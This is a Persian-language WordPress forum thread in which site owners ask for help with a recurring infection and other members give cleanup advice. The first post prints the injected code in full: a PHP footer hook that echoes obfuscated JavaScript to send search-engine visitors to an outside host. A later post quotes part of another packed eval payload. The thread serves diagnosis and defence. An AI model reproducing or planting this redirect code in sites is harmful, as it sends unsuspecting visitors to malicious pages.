eskafild 5 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 سلام یه تروجان افتاده تو قالبم هی می پاکم بر میگرده چه کنم؟ورژن وردپرس رو هم ارتقاع دادم فایده نداد<?phpadd_action('get_footer', 'add_sscounter');function add_sscounter(){echo '<!--scounter-->';if(function_exists('is_user_logged_in')){if(time()%2 == 0 && !is_user_logged_in()){echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>"; 1 نقل قول لینک به ارسال
محسن غیاثی 1853 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 سلام دوست عزیزاحتمالا شل آپلود شده تو سایتتون. میتونین از مسئول هاستتون درخواست کنین در صورت امکان چک و فایل مخرب رو پیدا کنن. افزونهی Threat Scan هم ممکنه مورد رو تشخیص بده.حتما فایل wp-config.php رو به یک پوشه بالاتر از سطحی که وردپرس نصب شده منتقل کنین و پرمیژنش رو ۴۰۰ یا ۴۴۰ قرار بدین. 6 نقل قول لینک به ارسال
Morteza 34190 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 در تکمیل حرف محسن عزیزاین یک redirector هست و تنها مشکلی که ایجاد میکنه استاپ شدن صفحه توسط آنتی ویروسهاست.تغییر سطح دسترسی فایل wp-config.php بهترین گزینه خواهد بود. 6 نقل قول لینک به ارسال
eskafild 5 ارسال شده در اردیبهشت 91 مالک گزارش بازنشر ارسال شده در اردیبهشت 91 ببخشیدا این کد رو من از(functions.php) پیدا کردم این رو حذف کردنی دیگه ویروس کش خطا نمیدخ]ولی یه مدت دیگه دوباره بر می گرده 2 نقل قول لینک به ارسال
Mostafa 2587 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 هنوز راه نفوذ این تروجان به functions.php پوسته کاملا مشخص نشده.تااونجایی که بررسی کردم، این کد به صورت خوکار از plugin-editor.php و theme-editor.php نفوذ میکند!برای رفع همین مشکل، میتونید موقت از این افزونه webstudio استفاده کنید و در صفحه تنظیمات، ویرایشگر کدها را غیرفعال کنید.فکر کنم یکی از افزونه های محبوب وردپرس، باگ کوچکی داشته باشه که باعث این مشکل شده باشه. چون خیلی از سایت ها سریعا به این تروجان آلوده میشن و وردپرس هم حرفی از این تروجان نزده! 8 نقل قول لینک به ارسال
Parsa 23463 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 در ادامه بحثپرمیژن نوشتن را هم از فایل functions قالب بگیرید. => 400 5 نقل قول لینک به ارسال
eskafild 5 ارسال شده در اردیبهشت 91 مالک گزارش بازنشر ارسال شده در اردیبهشت 91 هنوز راه نفوذ این تروجان به functions.php پوسته کاملا مشخص نشده.تااونجایی که بررسی کردم، این کد به صورت خوکار از plugin-editor.php و theme-editor.php نفوذ میکند!برای رفع همین مشکل، میتونید موقت از این افزونه webstudio استفاده کنید و در صفحه تنظیمات، ویرایشگر کدها را غیرفعال کنید.فکر کنم یکی از افزونه های محبوب وردپرس، باگ کوچکی داشته باشه که باعث این مشکل شده باشه. چون خیلی از سایت ها سریعا به این تروجان آلوده میشن و وردپرس هم حرفی از این تروجان نزده!ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:این وبگاه ممکن است به رایانه شما آسیب وارد نماید. http://support.google.com/websearch/bin/answer.py?hl=en&answer=45449این چی بید؟ 1 نقل قول لینک به ارسال
Morteza 34190 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 سایت شما malware یا همون بدافزار هم داره.در بخش google webmaster اکانت دارید؟در اونجا محل بدافزار رو بهتون میگه. 2 نقل قول لینک به ارسال
tazeh 625 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 سایت شما malware یا همون بدافزار هم داره.در بخش google webmaster اکانت دارید؟در اونجا محل بدافزار رو بهتون میگه.سلامهمین همین خطا رو هم برای وب سایت من رخ داده .من از دوافزونه anti-malware و Expolit scanner استفاده کردم ، و افزونه ها رو حذف و دوباره نصب کردم و وردپرس رو هم بروز رسانی کردم.الان ورودی گوگل افزایش یافته ولی هنوز این خطا از زیر وب سایتم پاک نشده ، حدود 8 روزه که من وردپرس رو بروز رسانی کرده ام.This site may be compromised.در گوگل وب مستر هم صفحات آلوده رو نشون داده.من باید اون صفحه ها رو حذف کنم؟ 1 نقل قول لینک به ارسال
Mostafa 2587 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:این وبگاه ممکن است به رایانه شما آسیب وارد نماید.http://support.googl...en&answer=45449این چی بید؟1. ابتدا کل سیستمتون رو با برنامه male ware byte اسکن کنید2. پسورد FTP و Host رو تغییر بدین.3. همانطور که مرتضی گفت، از گوگل وبمستر هم اقدام کنید.فایرفاکس هم از دیتابیس گوگل برای تشخیص آلوده بودن سایت استفاده میکنه! سریعا باید اقدام کنید. 5 نقل قول لینک به ارسال
Mostafa 2587 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 سلامهمین همین خطا رو هم برای وب سایت من رخ داده .من از دوافزونه anti-malware و Expolit scanner استفاده کردم ، و افزونه ها رو حذف و دوباره نصب کردم و وردپرس رو هم بروز رسانی کردم.الان ورودی گوگل افزایش یافته ولی هنوز این خطا از زیر وب سایتم پاک نشدهThis site may be compromised.در گوگل وب مستر هم صفحات آلوده رو نشون داده.من باید اون صفحه ها رو حذف کنم؟سلام، شما هم میتونید این مراحل را طی کنید.نیازی به حذف نیست!البته این ویروس همیشه در دیتابیس جای میگیرد! یکسری کدمخرب هست و در بیشتر صفحات ظاهر میشود. دیتابیس را تعمیر و بهینه کنید مشکل رو حل میکند.البته بعضی هاشون یک Table جداگونه برای این کار دارند D: 5 نقل قول لینک به ارسال
Saeed Fard 4740 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:این وبگاه ممکن است به رایانه شما آسیب وارد نماید.http://support.googl...en&answer=45449این چی بید؟به نظر من بهتره با پشتيباني هاستتون موضوع رو در ميان بزاريد ، اونها با اسكنرهاي قوي خودشون هاست شما رو اسكن و از بد افزار خالي ميكنند ..بعد اين هم طبق گفتهي آقا مصطفي عزيز تمامي پسوردها رو عوض كنيد و مسائل امنيتي رو رعايت كنيد .. 5 نقل قول لینک به ارسال
tazeh 625 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 من همه ی کارهایی رو که گفتید انجام دادمولی هنوز گوگل همون خطا رو می ده و دیگه اینکه بعد از بروز رسانی وردپرس جفنگ زیاد نمی یومد . اما الان دوباره زیاد میادبیشتر مشکل هم تو افزونه exe-php که دارای تروجان هست. که یک افزونه بسیار کاربردی برای منه.و تابع های eval() توی فایل های مختلف php وجود داره. که با Expolit scanner میزنم می گه که کدهای مخرب eval()مثلا:wp-content/plugins/wp-jalali/inc/js/editjalali.js:1eval(function(p,a,c,k,e,d){e=function©{return(c<a?باید چطوری این تابع های خطرناک رو حذف کرد و از دوباره ایجاد شدن این تابع ها در وردپرس جلوگیری کرد؟ 1 نقل قول لینک به ارسال
Morteza 34190 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 احتمال زیاد مشکل از سمت سرور شماست که آلوده شده.اگر از سرور باشه شما خیلی نمیتونی کار خاصی انجام بدی و باید مدیر سرور پاکسازی انجام بده.این کدی هم که دادین :eval(function(p,a,c,k,e,d){e=function©{return(c<a?تکه ایی از یک بدافزار هست. و اینطور که گوگل آلرت میده بصورت وسیع روی سرور شما پخش شده. 4 نقل قول لینک به ارسال
Mostafa 2587 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 با نظر مرتضی موافقم! شما نمیتونید دقیقا بررسی کنید و تک تک فایل هارا ببینید. با میزبانی خود تماس بگیرید و از ایشون بخواهید که کلمه eval را در تمام فایل های شما سرچ کنید و نتیجه را به شما بدهد.به این نکنه هم توجه کنید که بعد از پاکسازی تروجان، کمی زمان میبرد تا وب گاه شما در دسترسی قرار گیرد 4 نقل قول لینک به ارسال
eskafild 5 ارسال شده در اردیبهشت 91 مالک گزارش بازنشر ارسال شده در اردیبهشت 91 ببخشید گوگل وب مستر که یه کد میده تو head بزنیم اون رو قسمت رو توی قالب پیدا نمی کنم، چطور فعالش کنم تو وب مستر؟ نقل قول لینک به ارسال
Morteza 34190 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 ببخشید گوگل وب مستر که یه کد میده تو head بزنیم اون رو قسمت رو توی قالب پیدا نمی کنم، چطور فعالش کنم تو وب مستر؟مربوط به چی هست؟! 1 نقل قول لینک به ارسال
tazeh 625 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 سلام به دوستانبا توجه به راهنمایی که کردید ، انجام دادم و الان اون خطا که در زیر وب سایتم در گوگل بود پاک شده و ورودی گوگل هم افزایش یافتهبا تشکر فراوان از اساتید 1 نقل قول لینک به ارسال
eskafild 5 ارسال شده در اردیبهشت 91 مالک گزارش بازنشر ارسال شده در اردیبهشت 91 مربوط به چی هست؟!کدی که قرار می دیم تو سایت تا با گوگل وب مستر ارتباط برقرار کنه!شما از کدوم روش استفاده می کنید؟ نقل قول لینک به ارسال
Morteza 34190 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 منظورتون کد آنالیزور گوگل هست؟ نقل قول لینک به ارسال
eskafild 5 ارسال شده در اردیبهشت 91 مالک گزارش بازنشر ارسال شده در اردیبهشت 91 بله کد وبمستر که می ده تو کدوم پوشه از کد ها باید گذاشت؟ نقل قول لینک به ارسال
Morteza 34190 ارسال شده در اردیبهشت 91 گزارش بازنشر ارسال شده در اردیبهشت 91 کد جاوااسکریپت هست.باید در فایل header و قبلا از</head>قرار بدید.یعنی داخل تگ head باشه. نقل قول لینک به ارسال
pichgooshti 23 ارسال شده در خرداد 91 گزارش بازنشر ارسال شده در خرداد 91 سلاممیشه یه نگاه هم به وبسایت من بندازید؟Pichgooshti.comاصلا نمیتونم واردش بشم. هم مرورگر و هم ویروسیاب گیر میدن.وارد سی پنل هم که میشم، مرورگر گیر میده و اصلا وارد فایل منیجر سی پنل نمیتونم بشم. خیلی وقته اینجوره (تقریبا دیگه از وبسایت هیچی نمونده). نقل قول لینک به ارسال
Saeed Fard 4740 ارسال شده در خرداد 91 گزارش بازنشر ارسال شده در خرداد 91 سلام ، به انجمن خوش اومديد ..دوست عزيز سايت شما داراي بد افزار هستش و اسپم شده ، من قبلا ديده بودم سايتتون رو خيلي وقته اينجوري هستش ، چرا هيچ اقدامي نكرديد تا الان ؟با هاستتون كه دسترسي نداريد ؟ بهتره با پشتيباني سرورتون تماس بگيريد تا هاستتون رو اسكن كنند ، يا خيلي بهترش اينه كه به غير از wp-config و theme تمامي فايلهاي هاستتون رو پاك كنند كه حداقل از اين حالت خارج بشه ، و از نو وردپرس رو نصب و راهاندازي كنيد .. 2 نقل قول لینک به ارسال
pichgooshti 23 ارسال شده در تیر 91 گزارش بازنشر ارسال شده در تیر 91 (ویرایش شده) سلام ، به انجمن خوش اومديد ..دوست عزيز سايت شما داراي بد افزار هستش و اسپم شده ، من قبلا ديده بودم سايتتون رو خيلي وقته اينجوري هستش ، چرا هيچ اقدامي نكرديد تا الان ؟با هاستتون كه دسترسي نداريد ؟ بهتره با پشتيباني سرورتون تماس بگيريد تا هاستتون رو اسكن كنند ، يا خيلي بهترش اينه كه به غير از wp-config و theme تمامي فايلهاي هاستتون رو پاك كنند كه حداقل از اين حالت خارج بشه ، و از نو وردپرس رو نصب و راهاندازي كنيد ..ممنونخب اصلا وقتش نبوده.یعنی میفرمایید کل اطلاعاتش (یعنی بیش از 1000 تا پست) هم باید پاک بشه؟ ویرایش شده تیر 91 توسط pichgooshti نقل قول لینک به ارسال
پست های پیشنهاد شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .